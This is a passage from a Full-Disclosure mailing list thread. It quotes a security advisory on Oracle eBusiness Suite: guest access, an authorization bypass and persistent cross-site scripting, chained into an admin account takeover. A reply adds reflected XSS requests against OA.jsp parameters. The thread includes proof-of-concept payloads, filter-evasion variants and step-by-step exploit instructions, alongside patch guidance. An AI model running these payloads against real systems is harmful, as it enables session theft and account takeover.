[<prev] [next>] [day] [month] [year] [list]
Message-ID: <a4dcca121002221530u39adb73ck38aadb2218e1cf8e@mail.gmail.com>
Date: Tue, 23 Feb 2010 05:00:18 +0530
From: Karn Ganeshen <karnganeshen@...il.com>
To: Ofer Maor <ofer.maor@...sp.org>, full-disclosure@...ts.grok.org.uk
Subject: Re: Oracle eBusiness Suite 11i - Cross Site
Scripting - All Parameters
Hi,
Specific to 11i, I have found there are, infact, 3 parameters vulnerable to
reflective XSS in OA.jsp.
###
1. *page*
HTTP Request:
GET /OA_HTML/OA.jsp?page=/oracle/apps/fnd/framework/navigate/
webui/HomePage"/><script>alert("XSS")</script>&homePage=Y&OAPB
2. *_rc*
HTTP Request:
GET /OA_HTML/OA.jsp?_rc=>"'><script>alert("XSS")</script>&_ri=&retainAM=&_
userOrSSWAPortalUrl=&_ti=&oapc= HTTP/1.0
3. *transactionid*
HTTP Request:
GET /OA_HTML/OA.jsp?page=/oracle/apps/fnd/framework/navigate/
webui/HomePage&homePage=Y&OAPB=FWK_HOMEPAGE_BRAND&transactionid=123"/>%
3ciframe%20src%3djavascript%3aalert('XSS')%3e&oapc=2 HTTP/1.0
###
Per Oracle, *all *security patches upto and including July 2009 CPU must be
applied in order to mitigate this.
Best Regards,
*Karn Ganeshen*
On Mon, Dec 14, 2009 at 9:48 PM, Pradip Sharma <sharma.pradip@...il.com>wrote:
> Very nice finding, keep it up.
>
> Warm regards,
> Pradip
>
>
> On Mon, Dec 14, 2009 at 7:33 PM, Ofer Maor <ofer.maor@...sp.org> wrote:
>
>> Hacktics Research Group Security Advisory
>> http://www.hacktics.com/#details=;view=Resources%7CAdvisory
>> By Shay Chen, Hacktics.
>> 14-Dec-2009
>>
>> ===========
>> I. Overview
>> ===========
>> During a penetration test performed by Hacktics' experts, certain
>> vulnerabilities were identified in the Oracle eBusiness Suite deployment.
>> Further research has identified several vulnerabilities which, combined,
>> can
>> allow an unauthenticated remote user to take over and gain full control
>> over
>> the administrative web user account of the Oracle eBusiness Suite.
>>
>> A friendly formatted version of this advisory, including a video
>> demonstrating step-by-step execution of the exploit, is available in:
>> http://www.hacktics.com/content/advisories/AdvORA20091214.html
>>
>> ===============
>> II. The Finding
>> ===============
>> Three separate issues have been identified:
>>
>> 1. Unauthenticated Guest Access
>> -------------------------------
>> It is possible for unauthenticated users to access certain pages with
>> guest
>> privileges (according to Oracle's security representative - this is a
>> standard functionality of this component). While some pages may not be
>> directly accessible as a guest in this manner, this can be bypassed by
>> taking advantage of the session management behavior in the application.
>>
>> 2. Authorization Bypass
>> -----------------------
>> Malicious users can access and manage content of other users, relying on
>> the
>> lack of access control in the page management interface. Attackers can use
>> parameter tampering techniques to directly access the resource identifiers
>> of pages owned by other users, and delete or modify their content.
>>
>> 3. Persistent Cross Site Scripting
>> ----------------------------------
>> Certain web interfaces in the user's menu management interface enable
>> attackers to inject malicious scripts into user-specific content, causing
>> the scripts to be executed in the browser of any user viewing the infected
>> content (Persistent Cross Site Scripting).
>>
>> By combining all three vulnerabilities, an unauthenticated attacker can
>> initially gain guest access, leverage it to access pages belonging to the
>> administrative user, and inject malicious Java-script into their content,
>> in
>> order to steal session identifiers, which allow taking over the
>> administrative user account.
>>
>> ============
>> III. Details
>> ============
>> 1. Unauthenticated Guest Access
>> --------------------------------
>> By accessing certain internal pages directly, attackers can cause the
>> application to grant them guest access and load certain objects into the
>> user's server side session. At this point, the attacker is able to access
>> other internal components in the application as the guest user, including
>> management services, configuration interfaces and information disclosing
>> components, etc.
>>
>> Unauthenticated attackers can bypass the login phase by directly accessing
>> certain internal URLs such as (partial list):
>> http://host:port/OA_HTML/OA.jsp
>> http://host:port/OA_HTML/RF.jsp
>>
>> When accessing one of these URLs, the system generates an exception and an
>> error is presented to the client. However, as part of the process, the JSP
>> code populates the session object of the user with guest privileges. The
>> attacker can then access other pages in the systems which allow guest
>> operations, such as:
>> http://host:port/OA_HTML/AppsChangePassword.jsp
>> http://host:port/pls/[DADName]/OracleMyPage.home
>> http://host:port/pls/[DADName]/icx_define_pages.editpagelist
>>
>> 2. Authorization Bypass
>> -----------------------
>> Various page management URLs in the Oracle eBusiness Suite rely on the
>> parameter named [p_page_id] to determine which page to manage. An attacker
>> can easily access the page of another user, by simply altering that
>> parameter value to a value representing the other's user page. No
>> authorization checks are performed to verify the authenticity of the user
>> attempting the access.
>>
>> The following proof-of-concept samples are provided (the [p_page_id] has
>> to
>> be associated with a page of a valid user):
>>
>> http://host:port
>> /pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
>>
>> http://host:port
>> /pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME
>> &p_page_id=[page_id]
>> http:// host:8888/pls/TEST/oracleconfigure.customize?p_page_id=1
>>
>> 3. Persistent Cross Site Scripting
>> ----------------------------------
>> Various interfaces under the personal page management interface are
>> vulnerable to Persistent Cross Site Scripting:
>> http://host:port/pls/[DADName]/icx_define_pages.editpagelist
>>
>> http://host:port
>> /pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
>>
>> An attacker can inject malicious scripts into the various properties of a
>> new or existing page object (via submitted forms).
>>
>> http://host:port
>> /pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME
>> &p_page_id=[page_id]
>>
>> http://host:port
>> /pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE
>>
>>
>> The injected script will be executed when the user accesses the main URL:
>> http://host:port/pls/[DADName]/OracleMyPage.home
>>
>> It is important to note that our testing has indicated that different
>> versions have different mitigation levels of this vulnerability,
>> requiring,
>> in some situations, utilizing XSS evasion techniques to overcome certain
>> input validation and sanitation mechanisms:
>>
>> * For earlier versions, injecting a simple <SCRIPT> suffices:
>> <SCRIPT>alert('XSS')<SCRIPT>
>>
>> * Some versions limit the permitted characters, and thus require the
>> tester
>> to inset Java-script without utilizing tags, by injecting a script into
>> the
>> text box as follows:
>> ");alert('XSS');//
>>
>> * Later versions appear to also enforce server-side length restrictions on
>> the vulnerable parameters. As a result, multiple separate injections are
>> required to achieve script execution, such as:
>> ");/*
>> */alert/*
>> */(/*
>> */'XSS'/*
>> */);//
>>
>> ===========
>> IV. Exploit
>> ===========
>> The exploit is performed by combining the three vulnerabilities, as
>> described in the following scenario:
>>
>> A. Initially, an attacker gains guest access to the system, by first
>> accessing:
>> http://host:port/OA_HTML/OA.jsp
>>
>> While an error is generated at this step, the attacker can proceed now to
>> the "My Homepage" page, which will now allow guest access:
>> http://host:port/pls/[DADName]/OracleMyPage.home
>>
>> B. The attacker now goes to edit his personal homepage, by accessing the
>> "Edit Page List" URL:
>> http://host:port/pls/[DADName]/icx_define_pages.editpagelist
>>
>> The attacker then selects his homepage, and clicks Rename (opening the
>> following URL):
>>
>> http://host:port
>> /pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME
>> &p_page_id=[page_id]
>>
>> C. The attacker now changes the [p_page_id] to the [p_page_id] of the
>> victim's page (as this is an incremental ID, simple trial and error could
>> be
>> used until the administrator's user page is identified).
>>
>> D. The attacker then uses the Rename Form to change the name of the page
>> from its original name to an embedded script:
>>
>> ");alert('XSS');//
>>
>> This script can now be replaced with the relevant payload, for instance, a
>> script that steals the session ID and sends it to the attacker.
>>
>> ===================
>> V. Affected Systems
>> ===================
>> This vulnerability was tested and identified in Oracle eBusiness Suite
>> versions 10 and 11.
>>
>> ==============================
>> VI. Vendor's Response/Solution
>> ==============================
>> Oracle's security alerts group has been notified of this vulnerability in
>> early November.
>> According to Oracle, the first issue is not a vulnerability - guest access
>> is permitted by design. The other two have been acknowledged by Oracle,
>> and
>> have been fixed in the Jan-2009 CPU:
>>
>>
>> http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuj
>> an2009.html<http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html>
>>
>> It is important to note that the default fix for this vulnerability is a
>> script removing this interface (which is now replaced with a new OA
>> Framework). Customers unwilling or unable to switch to the new interface,
>> should apply patch 7567354 which, according to Oracle, fixes these
>> vulnerabilities on the obsolete packages (Hacktics has not performed tests
>> to verify this patch).
>>
>> ===========
>> VII. Credit
>> ===========
>> These vulnerabilities were discovered by:
>> Shay Chen, Technical Leader, Security Services, Hacktics.
>> Additional Contribution:
>> Gil Cohen, Application Security Consultant, Hacktics.
>> Oren Hafif, Application Security Consultant, Hacktics.
>>
>>
>> ---
>> Ofer Maor
>> CTO, Hacktics
>> Chairman, OWASP Israel
>>
>> Web: www.hacktics.com
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists